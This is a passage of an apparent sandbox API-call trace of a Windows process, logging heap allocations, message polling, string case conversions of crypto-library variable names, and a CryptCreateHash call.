Size=0x4) returned 0x2e54e18 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0212.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.547] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0212.547] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.548] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0212.548] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.548] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0212.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.549] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.549] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0212.549] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0212.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0212.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.551] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0212.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0212.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0212.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0212.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0212.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0212.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0212.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0212.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ee8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.557] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e38 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 